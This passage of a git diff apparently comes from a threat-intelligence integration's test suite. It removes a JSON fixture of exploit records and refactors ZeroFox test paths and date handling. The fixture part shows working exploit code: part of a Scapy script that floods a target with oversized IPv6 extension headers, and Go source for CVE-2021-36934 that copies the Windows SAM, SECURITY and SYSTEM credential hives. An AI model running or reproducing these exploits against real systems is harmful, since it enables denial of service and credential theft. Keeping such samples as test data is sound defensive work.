IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n 
PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n 
PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = 
[\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n 
PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xff)),\n PadN(optdata=('c'*0xff)),\n PadN(optdata=('d'*0xff)),\n PadN(optdata=('e'*0xff)),\n PadN(optdata=('f'*0xff)),\n PadN(optdata=('0'*0xff)),\n ]) \\\n / IPv6ExtHdrDestOpt(options = [\n PadN(optdata=('a'*0xff)),\n PadN(optdata=('b'*0xa0)),\n ]) \\\n / IPv6ExtHdrFragment(\n id = second_pkt_id, m = 1,\n nh = 17, offset = 0\n ) \\\n / UDP(dport = 31337, sport = 
31337, chksum=0x7e7f)\n\n reassembled_pkt = bytes(reassembled_pkt)\n assert (len(reassembled_pkt) % 8) == 0, 'not aligned'\n frags = frag6(args.target, frag_id, reassembled_pkt, 60)\n\n print(f'{len(frags)} fragments, total size {hex(len(reassembled_pkt))}')\n sendp(frags, iface= args.iface)\n\n reassembled_pkt_2 = Ether() \\\n / IPv6(dst = args.target) \\\n / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \\\n / 'doar-e ftw'\n\n sendp(reassembled_pkt_2, iface = args.iface)\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--target', default = 'ff02::1')\n parser.add_argument('--iface', default = 'eth1')\n args = parser.parse_args()\n pull_the_trigger(args)\n return\n\nif __name__ == '__main__':\n main()" - }, - { - "created_at": "2021-07-26T17:24:06Z", - "cve": "CVE-2021-36934", - "urls": [ - "https://github.com/FireFart/hivenightmare", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934" - ], - "exploit": "package main\n\nimport (\n\t\"fmt\"\n\t\"io/ioutil\"\n\t\"os\"\n\t\"time\"\n)\n\nconst (\n\tbase = `\\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy`\n\ttimeFormat = \"2006-01-02T15_04_05Z07_00\"\n)\n\nfunc processFile(path string) ([]byte, time.Time, error) {\n\tf, err := os.Open(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error opening file: %+v\", err)\n\t}\n\tdefer f.Close()\n\tinfo, err := f.Stat()\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error getting file info: %+v\", err)\n\t}\n\tcontent, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\treturn nil, time.Now(), fmt.Errorf(\"error reading file content: %+v\", err)\n\t}\n\treturn content, info.ModTime(), nil\n}\n\nfunc checkFile(friendlyname, path string) ([]byte, time.Time, error) {\n\tvar lastmodify time.Time\n\tvar content []byte\n\tfor i := 1; i <= 20; i++ {\n\t\tfullPath := fmt.Sprintf(`%s%d\\%s`, base, i, path)\n\t\tfileContent, fileMod, err := processFile(fullPath)\n\t\tif err != nil 
{\n\t\t\t// fmt.Println(err)\n\t\t\tcontinue\n\t\t}\n\t\tif fileMod.After(lastmodify) {\n\t\t\tlastmodify = fileMod\n\t\t\tcontent = fileContent\n\t\t}\n\t}\n\tif content == nil || len(content) == 0 {\n\t\treturn nil, time.Now(), fmt.Errorf(\"could not detect a copy of %s in a shadow copy. Maybe the system is already patched or there are no shaow copies\", friendlyname)\n\t}\n\treturn content, lastmodify, nil\n}\n\nfunc main() {\n\tcontent, lastMod, err := checkFile(\"SAM\", `Windows\\System32\\config\\SAM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_sam_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SAM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SECURITY\", `Windows\\System32\\config\\SECURITY`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_security_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SECURITY to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n\n\tcontent, lastMod, err = checkFile(\"SYSTEM\", `Windows\\System32\\config\\SYSTEM`)\n\tif err != nil {\n\t\tfmt.Println(err)\n\t} else {\n\t\tfilename := fmt.Sprintf(\"hive_system_%s\", lastMod.Format(timeFormat))\n\t\tif err := ioutil.WriteFile(filename, content, 0644); err != nil {\n\t\t\tfmt.Printf(\"could not write %s: %v\\n\", filename, err)\n\t\t}\n\t\tfmt.Printf(\"Saved a copy of SYSTEM to %s with last modify date of %s\\n\", filename, lastMod)\n\t}\n}" - } - ] -} 
diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/create_entity.json b/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/create_entity.json deleted file mode 100644 index 48a690e4c128..000000000000 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/entities/create_entity.json +++ /dev/null @@ -1,3 +0,0 @@ -{ - "id": 1 -} diff --git a/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py b/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py index 50d5f8ae1474..9c995bfdb86b 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py +++ b/Packs/ZeroFox/Integrations/ZeroFox/ZeroFox_test.py @@ -30,10 +30,11 @@ BASE_URL = "https://api.zerofox.com" OK_CODES = (200, 201) FETCH_LIMIT = 100 +DATE_FORMAT = "%Y-%m-%dT%H:%M:%S" def load_json(file: str): - with open(file, 'r') as f: + with open(file) as f: return json.load(f) @@ -47,6 +48,14 @@ def build_zf_client() -> ZFClient: ) +def get_delayed_formatted_date(str_date: str, delay=timedelta(seconds=1)): + formatted_date = parse_date(str_date, date_formats=(DATE_FORMAT,),) + if formatted_date is None: + raise ValueError("date must be a valid string date") + delayed_date = formatted_date + delay + return delayed_date.strftime(DATE_FORMAT) + + def test_fetch_incidents_first_time_with_no_data(requests_mock, mocker): """ Given 
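Review bot: `get_delayed_formatted_date` in the second hunk of ZeroFox_test.py has no docstring and no return annotation, so a reader has to work out from the body that it re-serialises a DATE_FORMAT string shifted by one second and raises on input that does not parse; a one-line docstring such as `"""Return *str_date* (DATE_FORMAT) shifted by *delay*, default +1 s, re-serialised with DATE_FORMAT; raises ValueError when it does not parse."""` plus `-> str` on the signature would make the helper self-describing. The trailing comma in `date_formats=(DATE_FORMAT,),)` is left over from a multi-line form and reads oddly on one line; `parse_date(str_date, date_formats=(DATE_FORMAT,))` is cleaner. If `parse_date` here is dateparser's, `date_formats` is tried first rather than enforced as the only accepted format, so the `None` guard only catches complete parse failures — worth confirming against the import at the top of the file, which is outside this hunk.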
@@ -59,16 +68,15 @@ def test_fetch_incidents_first_time_with_no_data(requests_mock, mocker): And return last_fetch equal to first_fetch_time And 0 incidents """ - alerts_response = load_json("TestData/alerts/list_no_records.json") + alerts_response = load_json("test_data/alerts/list_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() - last_run = {} + last_run: dict = {} first_fetch_time = "2023-06-01T00:00:00" - date_format = "%Y-%m-%dT%H:%M:%S" first_fetch_time_parsed = parse_date( first_fetch_time, - date_formats=(date_format,), + date_formats=(DATE_FORMAT,), ) spy = mocker.spy(client, "list_alerts") @@ -98,21 +106,20 @@ def test_fetch_incidents_first_time(requests_mock, mocker): And return last_fetch equal to last alert timestamp + 1 second And 10 incidents correctly formatted """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") last_alert_timestamp = alerts_response["alerts"][-1]["timestamp"] requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() - last_run = {} + last_run: dict = {} first_fetch_time = "2023-06-01T00:00:00" - date_format = "%Y-%m-%dT%H:%M:%S" first_fetch_time_parsed = parse_date( first_fetch_time, - date_formats=(date_format,), + date_formats=(DATE_FORMAT,), + ) + last_alert_timestamp_formatted = get_delayed_formatted_date( + last_alert_timestamp, ) - last_alert_timestamp_formatted = (parse_date( - last_alert_timestamp, date_formats=(date_format,) - ) + timedelta(seconds=1)).strftime(date_format) spy = mocker.spy(client, "list_alerts") next_run, incidents = fetch_incidents( 
@@ -144,17 +151,16 @@ def test_fetch_incidents_no_first_time(requests_mock, mocker): And return last_fetch equal to last alert timestamp + 1 second And 10 incidents correctly formatted """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") last_alert_timestamp = alerts_response["alerts"][-1]["timestamp"] requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() last_run = {"last_fetched": "2023-07-01T12:34:56"} first_fetch_time = "2023-06-01T00:00:00" - date_format = "%Y-%m-%dT%H:%M:%S" - last_alert_timestamp_formatted = (parse_date( - last_alert_timestamp, date_formats=(date_format,) - ) + timedelta(seconds=1)).strftime(date_format) + last_alert_timestamp_formatted = get_delayed_formatted_date( + last_alert_timestamp, + ) spy = mocker.spy(client, "list_alerts") next_run, incidents = fetch_incidents( @@ -167,7 +173,7 @@ def test_fetch_incidents_no_first_time(requests_mock, mocker): list_alert_params = spy.call_args[0][0] min_timestamp_called = list_alert_params.get( "min_timestamp" - ).strftime(date_format) + ).strftime(DATE_FORMAT) assert min_timestamp_called == last_run["last_fetched"] assert list_alert_params.get("sort_direction") == "asc" assert next_run["last_fetched"] == last_alert_timestamp_formatted @@ -187,7 +193,7 @@ def test_get_modified_remote_data_command_with_no_data(requests_mock, mocker): It should list alerts with the last_fetched set in last_run And return an empty list """ - alerts_response = load_json("TestData/alerts/list_no_records.json") + alerts_response = load_json("test_data/alerts/list_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() 
@@ -213,7 +219,7 @@ def test_get_modified_remote_data_command(requests_mock, mocker): It should list alerts with the last_fetched set in last_run And return a list with the ids of the modified alerts as strings """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() @@ -243,7 +249,7 @@ def test_get_remote_data_command_with_opened_alert(requests_mock, mocker): And no entries in entries list """ alert_id = 123 - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) client = build_zf_client() @@ -270,7 +276,7 @@ def test_get_remote_data_command_with_closed_alert(requests_mock, mocker): And one entry in the entries list """ alert_id = "123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) client = build_zf_client() @@ -297,7 +303,7 @@ def test_get_alert_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) client = build_zf_client() 
@@ -328,7 +334,7 @@ def test_alert_user_assignment_command(requests_mock, mocker): """ alert_id = "123" username = "user123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/assign/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -363,7 +369,7 @@ def test_close_alert_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/closed_alert.json") + alert_response = load_json("test_data/alerts/closed_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/close/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -397,7 +403,7 @@ def test_open_alert_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/open/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -431,7 +437,7 @@ def test_alert_request_takedown_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/request_takedown/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) 
@@ -465,7 +471,7 @@ def test_alert_cancel_takedown_command(requests_mock, mocker): And with the correct output prefix """ alert_id = "123" - alert_response = load_json("TestData/alerts/opened_alert.json") + alert_response = load_json("test_data/alerts/opened_alert.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post(f"/1.0/alerts/{alert_id}/cancel_takedown/") requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -505,8 +511,8 @@ def test_modify_alert_tags_command(requests_mock, mocker): action = "add" action_in_request = "added" tags_in_request = tags.split(",") - alert_response = load_json("TestData/alerts/opened_alert.json") - change_tags_response = load_json("TestData/alerts/change_tags.json") + alert_response = load_json("test_data/alerts/opened_alert.json") + change_tags_response = load_json("test_data/alerts/change_tags.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/1.0/alerttagchangeset/", json=change_tags_response) requests_mock.get(f"/1.0/alerts/{alert_id}/", json=alert_response) @@ -556,7 +562,7 @@ def test_create_entity_command_with_true_flag(requests_mock, mocker): organization = "org" strict_name_matching_request = True tags_request = tags.split(",") - entity_response = load_json("TestData/entities/create_entity.json") + entity_response = load_json("test_data/entities/create_entity.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/1.0/entities/", json=entity_response) client = build_zf_client() 
@@ -615,7 +621,7 @@ def test_create_entity_command_with_false_flag(requests_mock, mocker): organization = "org" strict_name_matching_request = False tags_request = tags.split(",") - entity_response = load_json("TestData/entities/create_entity.json") + entity_response = load_json("test_data/entities/create_entity.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.post("/1.0/entities/", json=entity_response) client = build_zf_client() @@ -658,12 +664,12 @@ def test_list_alerts_command_with_no_records(requests_mock, mocker): And return an empty list as output And with the correct output prefix """ - alerts_response = load_json("TestData/alerts/list_no_records.json") + alerts_response = load_json("test_data/alerts/list_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() spy = mocker.spy(client, "list_alerts") - args = {} + args: dict = {} results = list_alerts_command(client, args) @@ -683,12 +689,12 @@ def test_list_alerts_command_with_records(requests_mock, mocker): And return a list with alerts as output And with the correct output prefix """ - alerts_response = load_json("TestData/alerts/list_10_records.json") + alerts_response = load_json("test_data/alerts/list_10_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/alerts/", json=alerts_response) client = build_zf_client() spy = mocker.spy(client, "list_alerts") - args = {} + args: dict = {} results = list_alerts_command(client, args) 
@@ -708,12 +714,12 @@ def test_list_entities_command_with_no_records(requests_mock, mocker): And return an empty list as output And with the correct output prefix """ - entities_response = load_json("TestData/entities/entities_no_records.json") + entities_response = load_json("test_data/entities/entities_no_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/", json=entities_response) client = build_zf_client() spy = mocker.spy(client, "list_entities") - args = {} + args: dict = {} results = list_entities_command(client, args) @@ -733,12 +739,12 @@ def test_list_entities_command_with_records(requests_mock, mocker): And return a list with entities as output And with the correct output prefix """ - entities_response = load_json("TestData/entities/entities_8_records.json") + entities_response = load_json("test_data/entities/entities_8_records.json") requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/", json=entities_response) client = build_zf_client() spy = mocker.spy(client, "list_entities") - args = {} + args: dict = {} results = list_entities_command(client, args) @@ -759,13 +765,13 @@ def test_get_entity_types_command_with_no_records(requests_mock, mocker): And with the correct output prefix """ entity_types_response = load_json( - "TestData/entities/entity_types_no_records.json", + "test_data/entities/entity_types_no_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/types/", json=entity_types_response) client = build_zf_client() spy = mocker.spy(client, "get_entity_types") - args = {} + args: dict = {} results = get_entity_types_command(client, args) 
@@ -786,13 +792,13 @@ def test_get_entity_types_command_with_records(requests_mock, mocker): And with the correct output prefix """ entity_types_response = load_json( - "TestData/entities/entity_types_10_records.json", + "test_data/entities/entity_types_10_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/entities/types/", json=entity_types_response) client = build_zf_client() spy = mocker.spy(client, "get_entity_types") - args = {} + args: dict = {} results = get_entity_types_command(client, args) @@ -813,13 +819,13 @@ def test_get_policy_types_command_with_no_records(requests_mock, mocker): And with the correct output prefix """ policy_types_response = load_json( - "TestData/policies/policy_types_no_records.json", + "test_data/policies/policy_types_no_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/policies/", json=policy_types_response) client = build_zf_client() spy = mocker.spy(client, "get_policy_types") - args = {} + args: dict = {} results = get_policy_types_command(client, args) @@ -840,13 +846,13 @@ def test_get_policy_types_command_with_records(requests_mock, mocker): And with the correct output prefix """ policy_types_response = load_json( - "TestData/policies/policy_types_13_records.json", + "test_data/policies/policy_types_13_records.json", ) requests_mock.post("/1.0/api-token-auth/", json={"token": ""}) requests_mock.get("/1.0/policies/", json=policy_types_response) client = build_zf_client() spy = mocker.spy(client, "get_policy_types") - args = {} + args: dict = {} results = get_policy_types_command(client, args) 
